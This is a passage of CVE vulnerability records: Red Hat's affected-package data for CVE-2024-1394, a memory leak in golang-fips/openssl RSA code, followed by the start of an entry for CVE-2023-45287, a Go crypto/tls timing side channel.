{ "lessThan": "*", "status": "unaffected", "version": "0:2.16.2-2.1.rhaos4.15.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.15::el9", "cpe:/a:redhat:openshift:4.15::el8" ], "defaultStatus": "affected", "packageName": "openshift-clients", "product": "Red Hat OpenShift Container Platform 4.15", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.15.0-202403211240.p0.g62c4d45.assembly.stream.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.15::el9", "cpe:/a:redhat:openshift:4.15::el8" ], "defaultStatus": "affected", "packageName": "ose-aws-ecr-image-credential-provider", "product": "Red Hat OpenShift Container Platform 4.15", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.15.0-202403211549.p0.g2e3cca1.assembly.stream.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.15::el9", "cpe:/a:redhat:openshift:4.15::el8" ], "defaultStatus": "affected", "packageName": "podman", "product": "Red Hat OpenShift Container Platform 4.15", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "3:4.4.1-21.1.rhaos4.15.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.15::el9", "cpe:/a:redhat:openshift:4.15::el8" ], "defaultStatus": "affected", "packageName": "runc", "product": "Red Hat OpenShift Container Platform 4.15", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "4:1.1.12-1.1.rhaos4.15.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.15::el9", "cpe:/a:redhat:openshift:4.15::el8" ], "defaultStatus": "affected", "packageName": "skopeo", "product": "Red Hat OpenShift Container Platform 4.15", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "2:1.11.2-21.2.rhaos4.15.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.15::el9" ], "defaultStatus": "affected", "packageName": "microshift", "product": "Red Hat OpenShift Container Platform 4.15", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.15.6-202403280951.p0.g94b1c2a.assembly.4.15.6.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:openshift:4.15::el9", "cpe:/a:redhat:openshift:4.15::el8" ], "defaultStatus": "affected", "packageName": "rhcos", "product": "Red Hat OpenShift Container Platform 4.15", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "415.92.202407191425-0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openstack:16.2::el8" ], "defaultStatus": "affected", "packageName": "etcd", "product": "Red Hat OpenStack Platform 16.2", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.3.23-16.el8ost", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openstack:17.1::el8" ], "defaultStatus": "affected", "packageName": "collectd-sensubility", "product": "Red Hat OpenStack Platform 17.1 for RHEL 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:0.2.1-3.el8ost", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openstack:17.1::el9" ], "defaultStatus": "affected", "packageName": "etcd", "product": "Red Hat OpenStack Platform 17.1 for RHEL 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.4.26-8.el9ost", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openstack:17.1::el9" ], "defaultStatus": "affected", "packageName": "collectd-sensubility", "product": "Red Hat OpenStack Platform 17.1 for RHEL 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:0.2.1-3.el9ost", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:openshift_data_foundation:4.16::el9" ], "defaultStatus": "affected", "packageName": "odf4/mcg-operator-bundle", "product": "RHODF-4.16-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v4.16.0-137", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:openshift_data_foundation:4.16::el9" ], "defaultStatus": "affected", "packageName": "odf4/mcg-rhel9-operator", "product": "RHODF-4.16-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v4.16.0-38", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:network_bound_disk_encryption_tang:1" ], "defaultStatus": "affected", "packageName": "tang-operator-bundle-container", "product": "NBDE Tang Server", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:ocp_tools" ], "defaultStatus": "affected", "packageName": "helm", "product": "OpenShift Developer Tools and Services", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:ocp_tools" ], "defaultStatus": "affected", "packageName": "odo", "product": "OpenShift Developer Tools and Services", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift_pipelines:1" ], "defaultStatus": "affected", "packageName": "openshift-pipelines-client", "product": "OpenShift Pipelines", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:serverless:1" ], "defaultStatus": "affected", "packageName": "openshift-serverless-clients", "product": "OpenShift Serverless", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:ansible_automation_platform" ], "defaultStatus": "affected", "packageName": "helm", "product": "Red Hat Ansible Automation Platform 1.2", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:ansible_automation_platform" ], "defaultStatus": "affected", "packageName": "openshift-clients", "product": "Red Hat Ansible Automation Platform 1.2", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:ansible_automation_platform:2" ], "defaultStatus": "affected", "packageName": "openshift-clients", "product": "Red Hat Ansible Automation Platform 2", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:certifications:1::el8" ], "defaultStatus": "affected", "packageName": "redhat-certification-preflight", "product": "Red Hat Certification for Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:certifications:1::el9" ], "defaultStatus": "affected", "packageName": "redhat-certification-preflight", "product": "Red Hat Certification for Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "buildah", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "containernetworking-plugins", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "host-metering", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "podman", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "rhc-worker-script", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "skopeo", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "container-tools:4.0/buildah", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "unaffected", "packageName": "container-tools:4.0/conmon", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "container-tools:4.0/containernetworking-plugins", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "container-tools:4.0/podman", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "container-tools:4.0/runc", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "container-tools:4.0/skopeo", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "unaffected", "packageName": "container-tools:4.0/toolbox", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "unaffected", "packageName": "git-lfs", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "unaffected", "packageName": "rhc", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "unaffected", "packageName": "weldr-client", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "butane", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "unaffected", "packageName": "conmon", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "unaffected", "packageName": "git-lfs", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "ignition", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "osbuild-composer", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "unaffected", "packageName": "toolbox", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "unaffected", "packageName": "weldr-client", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4" ], "defaultStatus": "unaffected", "packageName": "conmon-rs", "product": "Red Hat OpenShift Container Platform 4", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4" ], "defaultStatus": "unaffected", "packageName": "golang-github-prometheus-promu", "product": "Red Hat OpenShift Container Platform 4", "vendor": "Red Hat" }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:openshift:4" ], "defaultStatus": "unaffected", "packageName": "lifecycle-agent-operator-bundle-container", "product": "Red Hat OpenShift Container Platform 4", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4" ], "defaultStatus": "unknown", "packageName": "openshift4/bare-metal-event-relay-operator-bundle", "product": "Red Hat OpenShift Container Platform 4", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4" ], "defaultStatus": "unaffected", "packageName": "openshift4/numaresources-operator-bundle", "product": "Red Hat OpenShift Container Platform 4", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4" ], "defaultStatus": "unaffected", "packageName": "openshift4/ose-cluster-machine-approver", "product": "Red Hat OpenShift Container Platform 4", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4" ], "defaultStatus": "affected", "packageName": "rhcos", "product": "Red Hat OpenShift Container Platform 4", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift_container_storage:4" ], "defaultStatus": "unknown", "packageName": "mcg", "product": "Red Hat Openshift Container Storage 4", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift_devspaces:3:" ], "defaultStatus": "affected", "packageName": "devspaces/machineexec-rhel8", "product": "Red Hat OpenShift Dev Spaces", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift_gitops:1" ], "defaultStatus": "affected", "packageName": "openshift-gitops-1/gitops-operator-bundle", "product": "Red Hat OpenShift GitOps", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift_service_on_aws:1" ], "defaultStatus": "affected", "packageName": "rosa", "product": "Red Hat OpenShift on AWS", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:container_native_virtualization:4" ], "defaultStatus": "unaffected", "packageName": "kubevirt", "product": "Red Hat OpenShift Virtualization 4", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openstack:16.1" ], "defaultStatus": "unknown", "packageName": "etcd", "product": "Red Hat OpenStack Platform 16.1", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openstack:16.1" ], "defaultStatus": "affected", "packageName": "golang-qpid-apache", "product": "Red Hat OpenStack Platform 16.1", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openstack:16.1" ], "defaultStatus": "unaffected", "packageName": "qpid-proton", "product": "Red Hat OpenStack Platform 16.1", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openstack:16.2" ], "defaultStatus": "affected", "packageName": "golang-github-infrawatch-apputils", "product": "Red Hat OpenStack Platform 16.2", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openstack:16.2" ], "defaultStatus": "affected", "packageName": "golang-qpid-apache", "product": "Red Hat OpenStack Platform 16.2", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openstack:16.2" ], "defaultStatus": "unaffected", "packageName": "qpid-proton", "product": "Red Hat OpenStack Platform 16.2", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openstack:17.1" ], "defaultStatus": "affected", "packageName": "golang-github-infrawatch-apputils", "product": "Red Hat OpenStack Platform 17.1", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openstack:17.1" ], "defaultStatus": "affected", "packageName": "golang-qpid-apache", "product": "Red Hat OpenStack Platform 17.1", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openstack:17.1" ], "defaultStatus": "unaffected", "packageName": "qpid-proton", "product": "Red Hat OpenStack Platform 17.1", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openstack:18.0" ], "defaultStatus": "affected", "packageName": "etcd", "product": "Red Hat OpenStack Platform 18.0", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:service_interconnect:1" ], "defaultStatus": "affected", "packageName": "qpid-proton", "product": "Red Hat Service Interconnect 1", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:service_interconnect:1" ], "defaultStatus": "affected", "packageName": "skupper-cli", "product": "Red Hat Service Interconnect 1", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:service_interconnect:1" ], "defaultStatus": "affected", "packageName": "skupper-router", "product": "Red Hat Service Interconnect 1", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_software_collections:3" ], "defaultStatus": "unaffected", "packageName": "rh-git227-git-lfs", "product": "Red Hat Software Collections", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:storage:3" ], "defaultStatus": "unknown", "packageName": "heketi", "product": "Red Hat Storage 3", "vendor": "Red Hat" } ], "credits": [ { "lang": "en", "value": "Red Hat would like to thank @qmuntal and @r3kumar for reporting this issue." } ], "datePublic": "2024-03-20T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Important" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-401", "description": "Missing Release of Memory after Effective Lifetime", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-12-17T21:47:17.516Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:1462", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1462" }, { "name": "RHSA-2024:1468", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1468" }, { "name": "RHSA-2024:1472", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1472" }, { "name": "RHSA-2024:1501", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1501" }, { "name": "RHSA-2024:1502", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1502" }, { "name": "RHSA-2024:1561", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1561" }, { "name": "RHSA-2024:1563", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1563" }, { "name": "RHSA-2024:1566", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1566" }, { "name": "RHSA-2024:1567", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1567" }, { "name": "RHSA-2024:1574", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1574" }, { "name": "RHSA-2024:1640", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1640" }, { "name": "RHSA-2024:1644", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1644" }, { "name": "RHSA-2024:1646", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1646" }, { "name": "RHSA-2024:1763", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1763" }, { "name": "RHSA-2024:1897", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1897" }, { "name": "RHSA-2024:2562", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2562" }, { "name": "RHSA-2024:2568", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2568" }, { "name": "RHSA-2024:2569", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2569" }, { "name": "RHSA-2024:2729", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2729" }, { "name": "RHSA-2024:2730", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2730" }, { "name": "RHSA-2024:2767", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2767" }, { "name": "RHSA-2024:3265", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3265" }, { "name": "RHSA-2024:3352", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3352" }, { "name": "RHSA-2024:4146", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4146" }, { "name": "RHSA-2024:4371", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4371" }, { "name": "RHSA-2024:4378", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4378" }, { "name": "RHSA-2024:4379", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4379" }, { "name": "RHSA-2024:4502", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4502" }, { "name": "RHSA-2024:4581", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4581" }, { "name": "RHSA-2024:4591", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4591" }, { "name": "RHSA-2024:4672", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4672" }, { "name": "RHSA-2024:4699", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4699" }, { "name": "RHSA-2024:4761", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4761" }, { "name": "RHSA-2024:4762", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4762" }, { "name": "RHSA-2024:4960", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4960" }, { "name": "RHSA-2024:5258", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:5258" }, { "name": "RHSA-2024:5634", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:5634" }, { "name": "RHSA-2024:7262", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:7262" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2024-1394" }, { "name": "RHBZ#2262921", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262921" }, { "url": "https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136" }, { "url": "https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6" }, { "url": "https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f" }, { "url": "https://pkg.go.dev/vuln/GO-2024-2660" }, { "url": "https://vuln.go.dev/ID/GO-2024-2660.json" } ], "timeline": [ { "lang": "en", "time": "2024-02-06T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2024-03-20T00:00:00+00:00", "value": "Made public." } ], "title": "Golang-fips/openssl: memory leaks in code encrypting and decrypting rsa payloads", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-401: Missing Release of Memory after Effective Lifetime" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2024-1394", "datePublished": "2024-03-21T12:16:38.790Z", "dateReserved": "2024-02-09T06:02:35.056Z", "dateUpdated": "2024-12-17T21:47:17.516Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45287
Vulnerability from cvelistv5
Published
2023-12-05 16:18
Modified
2024-08-02 20:21
Severity ?
EPSS score ?
Summary
Before Go 1.20, the RSA based TLS key exchanges used the math/big library, which is not constant time. RSA blinding was applied to prevent timing attacks, but analysis shows this may not have been fully effective. In particular it appears as if the removal of PKCS#1 padding may leak timing information, which in turn could be used to recover session key bits. In Go 1.20, the crypto/tls library switched to a fully constant time RSA implementation, which we do not believe exhibits any timing side channels.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Go standard library | crypto/tls |
Version: 0 ≤ |
|
